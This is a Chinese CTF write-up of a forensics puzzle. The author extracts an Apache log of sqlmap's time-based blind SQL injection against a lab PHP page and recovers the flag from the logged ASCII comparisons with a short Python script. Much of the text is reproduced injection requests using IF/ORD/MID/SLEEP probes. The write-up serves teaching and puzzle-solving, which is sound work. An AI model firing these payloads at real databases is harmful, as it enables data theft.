第一次写write up,这道题的writeup其实网上也有,之前看了以后觉得步骤太麻烦,就没细看,刚刚重新做了一遍,发现并没有什么难度。。。

这题,题目给了一个log文件,将log改成rar后缀,解压,然后发现了一个真正的log文件,文件内容如下。

西普CTF-2015RCTF(misc50)-以夕阳落款

是不是很熟悉,用过sqlmap的同学一看就知道,这就是跑sqlmap时的日志文件,其中包含了,爆表名,爆字段名,爆字段内容等所有语句,我们要找flag,直接ctrl+F,查找flag,发现如下语句

/phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E51%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E48%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E49%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%21%3D49%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E51%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E48%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E1%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"

省略了后面的好多。。因为实在太长。拖进urldecode里面,url解码。我选出部分解码后的代码你们看看

192.168.52.1 - - [06/Nov/2015:19:33:07 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>64),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:07 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>96),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>80),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>88),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>84),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>82),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:09 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>81),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:09 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))!=82),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"

从这些里面发现了什么,发现sqlmap正在通过二分法爆flag表的flag字段内容,这就简单了,我们找到类似于!=82这样的地方,这个地方就代表着每一位爆出来的字符的ascii码,一共有三十个。

[82,79,73,83,123,109,105,83,99,95,65,110,64,108,121,83,105,115,95,110,71,49,110,120,95,83,105,109,125,5]

最后一个的5有点不确定,因为我当时url解码只拖了这么多东西,不过不影响flag,因为那是一个多余的字符,我们把这些
转换为字符,我用python简单的写了一个转换,可以参考一下。

number = [82,79,73,83,123,109,105,83,99,95,65,110,64,108,121,83,105,115,95,110,71,49,110,120,95,83,105,109,125,5]
string2=''
for i in number:
    string=chr(i)
    string2=string2+string
print(string2)

最后得到flag

Flag:

温馨提示: 此处内容需要评论本文后刷新才能查看,支付2元即可直接查看所有Flag。

小广告:关于获取西普实验吧所有Writeup请点击这里查看索引

查看所有Flag需要付费,需要获取所有Flag的童鞋请访问这里成为付费用户,可以自助把自己的注册邮箱加入网站白名单,即可免回复看到本站所有Flag

Flag大全地址:所有Flag

PS:本站不是实验吧的官方站点,纯粹是个人博客,收取Flag费用仅是维持服务器费用,做站不易,且行窃珍惜,如果喜欢我的博客,愿意捐赠的,可以扫描下面的二维码

微信二维码:
支付宝二维码: